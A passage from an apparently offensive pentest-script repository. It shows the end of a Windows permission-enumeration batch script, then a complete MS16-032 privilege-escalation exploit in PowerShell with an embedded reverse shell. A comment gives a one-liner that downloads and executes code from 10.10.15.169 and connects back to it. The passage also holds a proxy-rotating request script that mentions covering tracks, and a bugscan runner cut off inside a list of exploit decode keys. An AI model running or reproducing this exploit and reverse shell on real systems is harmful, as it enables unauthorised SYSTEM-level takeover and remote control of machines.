name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 474 | 475 | rem All commands from this point onward will require accesschk.exe 476 | rem Make sure you have accesschk.exe(old version) in same directory when you run the script! 477 | 478 | @echo on 479 | 480 | rem #---------------------# 481 | rem # Vulnerable Services # 482 | rem #---------------------# 483 | 484 | @echo off 485 | 486 | rem By default WinXP SP1 grant "Authenticated Users" SERVICE_ALL_ACCESS to "SSDPSRV" and "upnphost"! 487 | 488 | accesschk.exe /accepteula -uwcqv "Authenticated Users" * 489 | accesschk.exe /accepteula -uwcqv "Power Users" * 490 | accesschk.exe /accepteula -uwcqv "Users" * 491 | 492 | @echo on 493 | 494 | rem #-------------------------------# 495 | rem # Vulnerable Folder Permissions # 496 | rem #-------------------------------# 497 | 498 | @echo off 499 | 500 | accesschk.exe /accepteula -uwdqs "Users" c:\ 501 | accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\ 502 | 503 | @echo on 504 | 505 | rem #-----------------------------# 506 | rem # Vulnerable File Permissions # 507 | rem #-----------------------------# 508 | 509 | @echo off 510 | 511 | accesschk.exe /accepteula -uwqs "Users" c:\*.* 512 | accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.* 513 | 514 | @echo on 515 | 516 | rem #----------------# 517 | rem # Happy Hunting! # 518 | rem #----------------# 519 | 520 | @echo off 521 | -------------------------------------------------------------------------------- /PrivilegeEscalation/Windows/ms16_032_intrd_mod.ps1: -------------------------------------------------------------------------------- 1 | ## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv 2 | 3 | # Follow this cmd to exploit MS16-032 to get admin and run shell.ps1(ATTACHMNT): Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command YOURCOMANDHERE" 4 | # To get a reverse powershell, serve this ms16_032_intrd_mod.ps1 and Invoke-PowerShellTcp.ps1, and use this download & exec oneliner: IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3003" 5 | 6 | function Invoke-MS16-032 { 7 | <# 8 | .SYNOPSIS 9 | 10 | PowerShell implementation of MS16-032. The exploit targets all vulnerable 11 | operating systems that support PowerShell v2+. Credit for the discovery of 12 | the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script. 13 | Modifications by Mike Benich (@benichmt1). 14 | 15 | Targets: 16 | 17 | * Win7-Win10 & 2k8-2k12 <== 32/64 bit! 18 | * Tested on x32 Win7, x64 Win8, x64 2k12R2 19 | 20 | Notes: 21 | 22 | * In order for the race condition to succeed the machine must have 2+ CPU 23 | cores. If testing in a VM just make sure to add a core if needed mkay. 24 | * The exploit is pretty reliable, however ~1/6 times it will say it succeeded 25 | but not spawn a shell. Not sure what the issue is but just re-run and profit! 26 | * Want to know more about MS16-032 ==> 27 | https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html 28 | .DESCRIPTION 29 | Author: Ruben Boonen (@FuzzySec) 30 | Blog: http://www.fuzzysecurity.com/ 31 | License: BSD 3-Clause 32 | Required Dependencies: PowerShell v2+ 33 | Optional Dependencies: None 34 | Empire Updates - Mike Benich / @benichmt1 35 | 36 | .EXAMPLE 37 | C:\PS> Invoke-MS16-032 38 | #> 39 | 40 | param ( 41 | [Parameter(Mandatory = $True)] 42 | [string]$Cmd 43 | 44 | ) 45 | 46 | ## intrd's powershell 47 | function Invoke-PowerShellTcp 48 | { 49 | 50 | [CmdletBinding(DefaultParameterSetName="reverse")] Param( 51 | 52 | [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] 53 | [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] 54 | [String] 55 | $IPAddress, 56 | 57 | [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] 58 | [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] 59 | [Int] 60 | $Port, 61 | 62 | [Parameter(ParameterSetName="reverse")] 63 | [Switch] 64 | $Reverse, 65 | 66 | [Parameter(ParameterSetName="bind")] 67 | [Switch] 68 | $Bind 69 | 70 | ) 71 | 72 | #Connect back if the reverse switch is used. 73 | if ($Reverse) 74 | { 75 | $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) 76 | } 77 | 78 | #Bind to the provided port if Bind switch is used. 79 | if ($Bind) 80 | { 81 | $listener = [System.Net.Sockets.TcpListener]$Port 82 | $listener.start() 83 | $client = $listener.AcceptTcpClient() 84 | } 85 | 86 | $stream = $client.GetStream() 87 | [byte[]]$bytes = 0..255|%{0} 88 | 89 | #Send back current username and computername 90 | $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") 91 | $stream.Write($sendbytes,0,$sendbytes.Length) 92 | 93 | #Show an interactive PowerShell prompt 94 | $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') 95 | $stream.Write($sendbytes,0,$sendbytes.Length) 96 | 97 | while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) 98 | { 99 | $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding 100 | $data = $EncodedText.GetString($bytes,0, $i) 101 | 102 | #Execute the command on the target. 103 | $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) 104 | 105 | $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' 106 | $x = ($error[0] | Out-String) 107 | $error.clear() 108 | $sendback2 = $sendback2 + $x 109 | 110 | #Return the results 111 | $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) 112 | $stream.Write($sendbyte,0,$sendbyte.Length) 113 | $stream.Flush() 114 | } 115 | $client.Close() 116 | $listener.Stop() 117 | } 118 | 119 | 120 | 121 | Add-Type -TypeDefinition @" 122 | using System; 123 | using System.Diagnostics; 124 | using System.Runtime.InteropServices; 125 | using System.Security.Principal; 126 | 127 | [StructLayout(LayoutKind.Sequential)] 128 | public struct PROCESS_INFORMATION 129 | { 130 | public IntPtr hProcess; 131 | public IntPtr hThread; 132 | public int dwProcessId; 133 | public int dwThreadId; 134 | } 135 | 136 | [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)] 137 | public struct STARTUPINFO 138 | { 139 | public Int32 cb; 140 | public string lpReserved; 141 | public string lpDesktop; 142 | public string lpTitle; 143 | public Int32 dwX; 144 | public Int32 dwY; 145 | public Int32 dwXSize; 146 | public Int32 dwYSize; 147 | public Int32 dwXCountChars; 148 | public Int32 dwYCountChars; 149 | public Int32 dwFillAttribute; 150 | public Int32 dwFlags; 151 | public Int16 wShowWindow; 152 | public Int16 cbReserved2; 153 | public IntPtr lpReserved2; 154 | public IntPtr hStdInput; 155 | public IntPtr hStdOutput; 156 | public IntPtr hStdError; 157 | } 158 | 159 | [StructLayout(LayoutKind.Sequential)] 160 | public struct SQOS 161 | { 162 | public int Length; 163 | public int ImpersonationLevel; 164 | public int ContextTrackingMode; 165 | public bool EffectiveOnly; 166 | } 167 | 168 | public static class Advapi32 169 | { 170 | [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] 171 | public static extern bool CreateProcessWithLogonW( 172 | String userName, 173 | String domain, 174 | String password, 175 | int logonFlags, 176 | String applicationName, 177 | String commandLine, 178 | int creationFlags, 179 | int environment, 180 | String currentDirectory, 181 | ref STARTUPINFO startupInfo, 182 | out PROCESS_INFORMATION processInformation); 183 | 184 | [DllImport("advapi32.dll", SetLastError=true)] 185 | public static extern bool SetThreadToken( 186 | ref IntPtr Thread, 187 | IntPtr Token); 188 | 189 | [DllImport("advapi32.dll", SetLastError=true)] 190 | public static extern bool OpenThreadToken( 191 | IntPtr ThreadHandle, 192 | int DesiredAccess, 193 | bool OpenAsSelf, 194 | out IntPtr TokenHandle); 195 | 196 | [DllImport("advapi32.dll", SetLastError=true)] 197 | public static extern bool OpenProcessToken( 198 | IntPtr ProcessHandle, 199 | int DesiredAccess, 200 | ref IntPtr TokenHandle); 201 | 202 | [DllImport("advapi32.dll", SetLastError=true)] 203 | public extern static bool DuplicateToken( 204 | IntPtr ExistingTokenHandle, 205 | int SECURITY_IMPERSONATION_LEVEL, 206 | ref IntPtr DuplicateTokenHandle); 207 | } 208 | 209 | public static class Kernel32 210 | { 211 | [DllImport("kernel32.dll")] 212 | public static extern uint GetLastError(); 213 | 214 | [DllImport("kernel32.dll", SetLastError=true)] 215 | public static extern IntPtr GetCurrentProcess(); 216 | 217 | [DllImport("kernel32.dll", SetLastError=true)] 218 | public static extern IntPtr GetCurrentThread(); 219 | 220 | [DllImport("kernel32.dll", SetLastError=true)] 221 | public static extern int GetThreadId(IntPtr hThread); 222 | 223 | [DllImport("kernel32.dll", SetLastError = true)] 224 | public static extern int GetProcessIdOfThread(IntPtr handle); 225 | 226 | [DllImport("kernel32.dll",SetLastError=true)] 227 | public static extern int SuspendThread(IntPtr hThread); 228 | 229 | [DllImport("kernel32.dll",SetLastError=true)] 230 | public static extern int ResumeThread(IntPtr hThread); 231 | 232 | [DllImport("kernel32.dll", SetLastError=true)] 233 | public static extern bool TerminateProcess( 234 | IntPtr hProcess, 235 | uint uExitCode); 236 | 237 | [DllImport("kernel32.dll", SetLastError=true)] 238 | public static extern bool CloseHandle(IntPtr hObject); 239 | 240 | [DllImport("kernel32.dll", SetLastError=true)] 241 | public static extern bool DuplicateHandle( 242 | IntPtr hSourceProcessHandle, 243 | IntPtr hSourceHandle, 244 | IntPtr hTargetProcessHandle, 245 | ref IntPtr lpTargetHandle, 246 | int dwDesiredAccess, 247 | bool bInheritHandle, 248 | int dwOptions); 249 | } 250 | 251 | public static class Ntdll 252 | { 253 | [DllImport("ntdll.dll", SetLastError=true)] 254 | public static extern int NtImpersonateThread( 255 | IntPtr ThreadHandle, 256 | IntPtr ThreadToImpersonate, 257 | ref SQOS SecurityQualityOfService); 258 | } 259 | "@ 260 | 261 | function Get-ThreadHandle { 262 | # StartupInfo Struct 263 | $StartupInfo = New-Object STARTUPINFO 264 | $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES 265 | $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread() 266 | $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread() 267 | $StartupInfo.hStdError = [Kernel32]::GetCurrentThread() 268 | $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size 269 | 270 | # ProcessInfo Struct 271 | $ProcessInfo = New-Object PROCESS_INFORMATION 272 | 273 | # CreateProcessWithLogonW --> lpCurrentDirectory 274 | $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName 275 | 276 | # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED 277 | $CallResult = [Advapi32]::CreateProcessWithLogonW( 278 | "user", "domain", "pass", 279 | 0x00000002, "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "$Cmd", 280 | 0x00000004, $null, $GetCurrentPath, 281 | [ref]$StartupInfo, [ref]$ProcessInfo) 282 | 283 | # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS 284 | $lpTargetHandle = [IntPtr]::Zero 285 | $CallResult = [Kernel32]::DuplicateHandle( 286 | $ProcessInfo.hProcess, 0x4, 287 | [Kernel32]::GetCurrentProcess(), 288 | [ref]$lpTargetHandle, 0, $false, 289 | 0x00000002) 290 | 291 | # Clean up suspended process 292 | $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) 293 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) 294 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) 295 | 296 | $lpTargetHandle 297 | } 298 | 299 | function Get-SystemToken { 300 | echo "`n[?] Trying thread handle: $Thread" 301 | echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)" 302 | 303 | $CallResult = [Kernel32]::SuspendThread($Thread) 304 | if ($CallResult -ne 0) { 305 | echo "[!] $Thread is a bad thread, moving on.." 306 | Return 307 | } echo "[+] Thread suspended" 308 | 309 | echo "[>] Wiping current impersonation token" 310 | $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero) 311 | if (!$CallResult) { 312 | echo "[!] SetThreadToken failed, moving on.." 313 | $CallResult = [Kernel32]::ResumeThread($Thread) 314 | echo "[+] Thread resumed!" 315 | Return 316 | } 317 | 318 | echo "[>] Building SYSTEM impersonation token" 319 | # SecurityQualityOfService struct 320 | $SQOS = New-Object SQOS 321 | $SQOS.ImpersonationLevel = 2 #SecurityImpersonation 322 | $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS) 323 | # Undocumented API's, I like your style Microsoft ;) 324 | $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos) 325 | if ($CallResult -ne 0) { 326 | echo "[!] NtImpersonateThread failed, moving on.." 327 | $CallResult = [Kernel32]::ResumeThread($Thread) 328 | echo "[+] Thread resumed!" 329 | Return 330 | } 331 | 332 | # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE 333 | $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle) 334 | if (!$CallResult) { 335 | echo "[!] OpenThreadToken failed, moving on.." 336 | $CallResult = [Kernel32]::ResumeThread($Thread) 337 | echo "[+] Thread resumed!" 338 | Return 339 | } 340 | 341 | echo "[?] Success, open SYSTEM token handle: $SysTokenHandle" 342 | echo "[+] Resuming thread.." 343 | $CallResult = [Kernel32]::ResumeThread($Thread) 344 | } 345 | 346 | # main() <--- ;) 347 | $ms16032 = @" 348 | __ __ ___ ___ ___ ___ ___ ___ 349 | | V | _|_ | | _|___| |_ |_ | 350 | | |_ |_| |_| . |___| | |_ | _| 351 | |_|_|_|___|_____|___| |___|___|___| 352 | 353 | [by b33f -> @FuzzySec] 354 | "@ 355 | 356 | 357 | 358 | 359 | $ms16032 360 | 361 | # Check logical processor count, race condition requires 2+ 362 | echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)" 363 | if ($([System.Environment]::ProcessorCount) -lt 2) { 364 | echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n" 365 | Return 366 | } 367 | 368 | # Create array for Threads & TID's 369 | $ThreadArray = @() 370 | $TidArray = @() 371 | 372 | echo "[>] Duplicating CreateProcessWithLogonW handles.." 373 | # Loop Get-ThreadHandle and collect thread handles with a valid TID 374 | for ($i=0; $i -lt 500; $i++) { 375 | $hThread = Get-ThreadHandle 376 | $hThreadID = [Kernel32]::GetThreadId($hThread) 377 | # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray 378 | if ($TidArray -notcontains $hThreadID) { 379 | $TidArray += $hThreadID 380 | if ($hThread -ne 0) { 381 | $ThreadArray += $hThread # This is what we need! 382 | } 383 | } 384 | } 385 | 386 | if ($($ThreadArray.length) -eq 0) { 387 | echo "[!] No valid thread handles were captured, exiting!`n" 388 | Return 389 | } else { 390 | echo "[?] Done, got $($ThreadArray.length) thread handle(s)!" 391 | echo "`n[?] Thread handle list:" 392 | $ThreadArray 393 | } 394 | 395 | echo "`n[*] Sniffing out privileged impersonation token.." 396 | foreach ($Thread in $ThreadArray){ 397 | 398 | # Null $SysTokenHandle 399 | $script:SysTokenHandle = [IntPtr]::Zero 400 | 401 | # Get handle to SYSTEM access token 402 | Get-SystemToken 403 | 404 | # If we fail a check in Get-SystemToken, skip loop 405 | if ($SysTokenHandle -eq 0) { 406 | continue 407 | } 408 | 409 | echo "`n[*] Sniffing out SYSTEM shell.." 410 | echo "`n[>] Duplicating SYSTEM token" 411 | $hDuplicateTokenHandle = [IntPtr]::Zero 412 | $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle) 413 | 414 | # Simple PS runspace definition 415 | echo "[>] Starting token race" 416 | $Runspace = [runspacefactory]::CreateRunspace() 417 | $StartTokenRace = [powershell]::Create() 418 | $StartTokenRace.runspace = $Runspace 419 | $Runspace.Open() 420 | [void]$StartTokenRace.AddScript({ 421 | Param ($Thread, $hDuplicateTokenHandle) 422 | while ($true) { 423 | $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle) 424 | } 425 | }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle) 426 | $AscObj = $StartTokenRace.BeginInvoke() 427 | 428 | echo "[>] Starting process race" 429 | # Adding a timeout (10 seconds) here to safeguard from edge-cases 430 | $SafeGuard = [diagnostics.stopwatch]::StartNew() 431 | while ($SafeGuard.ElapsedMilliseconds -lt 10000) { 432 | # StartupInfo Struct 433 | $StartupInfo = New-Object STARTUPINFO 434 | $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size 435 | 436 | # ProcessInfo Struct 437 | $ProcessInfo = New-Object PROCESS_INFORMATION 438 | 439 | # CreateProcessWithLogonW --> lpCurrentDirectory 440 | $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName 441 | 442 | # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED 443 | $CallResult = [Advapi32]::CreateProcessWithLogonW( 444 | "user", "domain", "pass", 445 | 0x00000002, "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "$Cmd", 446 | 0x00000004, $null, $GetCurrentPath, 447 | [ref]$StartupInfo, [ref]$ProcessInfo) 448 | 449 | $hTokenHandle = [IntPtr]::Zero 450 | $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle) 451 | # If we can't open the process token it's a SYSTEM shell! 452 | if (!$CallResult) { 453 | echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n" 454 | $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread) 455 | $StartTokenRace.Stop() 456 | $SafeGuard.Stop() 457 | Return 458 | } 459 | 460 | # Clean up suspended process 461 | $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) 462 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) 463 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) 464 | } 465 | 466 | # Kill runspace & stopwatch if edge-case 467 | $StartTokenRace.Stop() 468 | $SafeGuard.Stop() 469 | } 470 | } 471 | -------------------------------------------------------------------------------- /Python/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/.DS_Store -------------------------------------------------------------------------------- /Python/auto_get_proxy/run.py: -------------------------------------------------------------------------------- 1 | import random 2 | import requests 3 | 4 | 5 | 6 | def LoadUserAgents(uafile=''): 7 | uas = [] 8 | with open(uafile, 'rb') as uaf: 9 | for ua in uaf.readlines(): 10 | if ua: 11 | uas.append(ua.strip()[1:-1-1]) 12 | random.shuffle(uas) 13 | return uas 14 | 15 | # load the user agents, in random order 16 | #user_agents = LoadUserAgents(uafile="user_agents.txt") 17 | 18 | 19 | 20 | def LoadProxy(proxyfile=''): 21 | proxylist = [] 22 | with open(proxyfile,'rb') as proxyf: 23 | for i in proxyf.readlines(): 24 | if i: 25 | proxylist.append(i.strip().split(' ')[4][:-1]) 26 | #print list(i.strip()) 27 | return proxylist 28 | 29 | #LoadProxy('proxies.txt') 30 | 31 | 32 | proxy = {"http": "http://username:p3ssw0rd@10.10.1.10:3128"} 33 | url = 'http://api.openweathermap.org/data/2.5/weather' 34 | params = {} 35 | 36 | # load user agents and set headers 37 | uas = LoadUserAgents(uafile="user_agents.txt") 38 | ua = random.choice(uas) # select a random user agent 39 | 40 | # make the request 41 | #r = requests.get(url, proxies=proxy, params=params, headers=headers) 42 | 43 | import time 44 | 45 | def main(): 46 | proxy_list = LoadProxy('proxies.txt') 47 | for p in proxy_list: 48 | url = '' 49 | proxy = {"http": "http://%s" % str(p.strip()) } 50 | print "proxy:" 51 | print proxy 52 | 53 | headers = { 54 | # "Connection" : "close", # another way to cover tracks 55 | "User-Agent" : ua} 56 | time.sleep(random.randint(0, 30)) 57 | 58 | try: 59 | r = requests.get(url, proxies=proxy, params=params, headers=headers, timeout=2) 60 | print r.text 61 | except : 62 | pass 63 | 64 | 65 | if __name__ == "__main__": 66 | main() 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /Python/bugscan_run.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | Bugscan='https://www.bugscan.net/' 4 | from common import * 5 | import binascii 6 | from decode import Decoder 7 | 8 | from miniCurl import Curl 9 | curl = Curl() 10 | import util 11 | from functools import partial 12 | from fingerprint import FingerPrint 13 | import hackhttp 14 | hackhttp=hackhttp.hackhttp() 15 | fingerprint=FingerPrint() 16 | 17 | import sys 18 | import util 19 | 20 | EXP_DIR = '/home/leo/Desktop/bugscan0727/exp' 21 | def get_decode(filename): 22 | #dekey_dic = {'expback_2078pyc_dis.py': '28221b5847a673c1d138bec680e5aab1421a9eed705aca4c316159fd2291b910', 'expback_12pyc_dis.py': 'c3ff499db0ad225bc0cbd0f9cbd7910edaa8861a1f3ebe4cc7b168d1bdad3254', 'expback_189pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_77pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_72pyc_dis.py': '8c97d8c12ebb049684db59720d39ad8b38b0081d8cc8d022bd7768ab0bc7c699', 'expback_24pyc_dis.py': 'a27d8237a5f282cdeae742d17cd4e2ca40a686f9debe7307d414394cf8eb469a', 'expback_88pyc_dis.py': 'e77e60afe46271e855a1aaf4738acb8d2712649d7a0e38ee6de5e3cb6e102b19', 'expback_2065pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'exp4.py': '253f4221df8307dfb23c39726a022382162a520739738590c39520b032c15c30', 'expback_38pyc_dis.py': '8505495a868258d1a09f88cf12b87431531bedca34a3dafc03ab58d741c0bbd7', 'expback_1756pyc_dis.py': 'ab5d21d688e5789a47b617d47dc68e48a51243b1b93d3beaf737e411310753fe', 'exp104.py': '145f01b740b46451cc03bbae9d56fe31e385aa681381a9f4ce445f7997baeff5', 'expback_76pyc_dis.py': '0d98a92bbfd99bbfbcf9419d686661ac36d55d2a7ecc0c19768b0d7b0bd9191d', 'expback_18pyc_dis.py': '38ad0c291a56f74acaee1019f24f188a7ddbb6cc51d7e4c29fa993b568404fd1', 'expback_70pyc_dis.py': 'efb1fdfd9905e92bacd3a5367c4727dc7ae722ab7f214e1434b6e25041d34190', 'expback_8pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_6pyc_dis.py': '1d2d57097a9f25403de685038570b272b68e61ec0ad821f5db4ce2e380ba4f4e', 'expback_33pyc_dis.py': '48a2a41fd1a72f6feb52c058c767b31726ef9480f5624b9733cf8088e26475b6', 'expback_26pyc_dis.py': 'a27d8237a5f282cdeae742d17cd4e2ca40a686f9debe7307d414394cf8eb469a', 'expback_28pyc_dis.py': 'c3ff499db0ad225bc0cbd0f9cbd7910edaa8861a1f3ebe4cc7b168d1bdad3254', 'expback_1994pyc_dis.py': 'ffcc396606397e831f857f22b90d87ca05dd77452e7c2760df0f39d9d3f664cb', 'expback_22pyc_dis.py': '3f9632f701953df91e7b13b428d18ab7a549520831cc2a46984c83e81b933673', 'expback_23pyc_dis.py': 'e0a46b005bc3e4b63bf33f9097023d87614810c0b71a355e0934a7bc8a862f32', 'expback_1766pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_1070pyc_dis.py': '24000815b2f04e2f070d02f649539c6c6330a1bc45ad798962466966b7a220a4', 'expback_83pyc_dis.py': 'dd9108e2cb4dce78981dc247e24bd0df5c4b004058ebf271788a8e792d85a026', 'expback_100pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_2112pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_29pyc_dis.py': '24000815b2f04e2f070d02f649539c6c6330a1bc45ad798962466966b7a220a4', 'expback_89pyc_dis.py': '0d4af56f54b549460eae50cb9dc579022c7e046e050fbc72242da5f616e21867', 'expback_57pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_63pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_64pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_811pyc_dis.py': 'f8feb1e2013b989686230a93b8a543f2db83f2cc6b4dbc40f8b30bdf5e0dfeb9', 'expback_54pyc_dis.py': '4903f9969575cdef55f7b2ed2a12f89b97664e7fb5eb0898e6fd4f6775f166f3', 'expback_34pyc_dis.py': 'd289da3e7b9c736756e3429c23db20228f8e3547d3a4b540da1f86aaf22ff02f', 'expback_2083pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_15pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_1055pyc_dis.py': '7b650aed66397b6e1ba67dfdd39c9626c4c9fec89eebf397a76caa9d0ce45d26', 'expback_60pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_65pyc_dis.py': '24000815b2f04e2f070d02f649539c6c6330a1bc45ad798962466966b7a220a4', 'expback_59pyc_dis.py': '6ff51d6ad8855be91270868f2f9d9b2e225c722941906d5c0728a9409ef23b50', 'expback_2067pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_75pyc_dis.py': '3f9632f701953df91e7b13b428d18ab7a549520831cc2a46984c83e81b933673', 'expback_62pyc_dis.py': 'de92d01ce1a391792c2d4f41996a0b77c6c47605f032bdca21b0b5fd36c0f0f6', 'expback_1786pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_1745pyc_dis.py': '39b9843a532fed97e232f0a471ffbfb4079d8163a5e7dd52681e57c1e6520e53', 'expback_61pyc_dis.py': 'e1244c9d55465d4083a2a832fc4732472b91426238d7935d0e39126138afdac1', 'expback_39pyc_dis.py': '9a176f89756545161a807d6b5803333756eccaaad7ea2daa4e5eeb6c37a09ec0', 'expback_58pyc_dis.py': '2ec6a4bd513d71efdaaccb3aaf5c27487aef537f6091d14fcce0617c29dbf424', 'expback_2110pyc_dis.py': '33d7e04bb6b1e472eddb674398e5a3fce8abed59863e43f727ad78498ed63c27', 'expback_13pyc_dis.py': '253f4221df8307dfb23c39726a022382162a520739738590c39520b032c15c30', 'expback_1995pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_71pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_37pyc_dis.py': 'bce1c8cb73e24b4a1518702a3080d00aad9583c2a25f4c59b4dffb06c009a25f', 'expback_101pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_25pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_16pyc_dis.py': 'f5cebead3a728f681d272e67879a393bc37e3c857076d1b09926eeee1a34739b', 'expback_45pyc_dis.py': '6eaf26b1043248ae94ca258db5d5b068a610a213aa1d2af703532163d0bd1717', 'expback_30pyc_dis.py': 'e034570d4d73b2deeed98ff76911c89ff03ae6f0cef61a09f4091b55783c18b2', 'expback_102pyc_dis.py': '1d2d57097a9f25403de685038570b272b68e61ec0ad821f5db4ce2e380ba4f4e', 'expback_19pyc_dis.py': 'bce1c8cb73e24b4a1518702a3080d00aad9583c2a25f4c59b4dffb06c009a25f', 'expback_1062pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_17pyc_dis.py': 'b9e36259d273b00edcbf28048f0b716e08634efaab283f693ca067fe2162f575', 'expback_36pyc_dis.py': '145f01b740b46451cc03bbae9d56fe31e385aa681381a9f4ce445f7997baeff5', 'expback_74pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_641pyc_dis.py': 'bb4d873dfab45ce19dbb43ea954ddf1248a2a41fd1a72f6feb52c058c767b317', 'exp622.py': '145f01b740b46451cc03bbae9d56fe31e385aa681381a9f4ce445f7997baeff5', 'expback_73pyc_dis.py': 'c3facf1cb2752b65516b130189a508e1469f38055b509392cba7b314ffa070fb', 'expback_1071pyc_dis.py': '0d4af56f54b549460eae50cb9dc579022c7e046e050fbc72242da5f616e21867', 'expback_2066pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_1056pyc_dis.py': 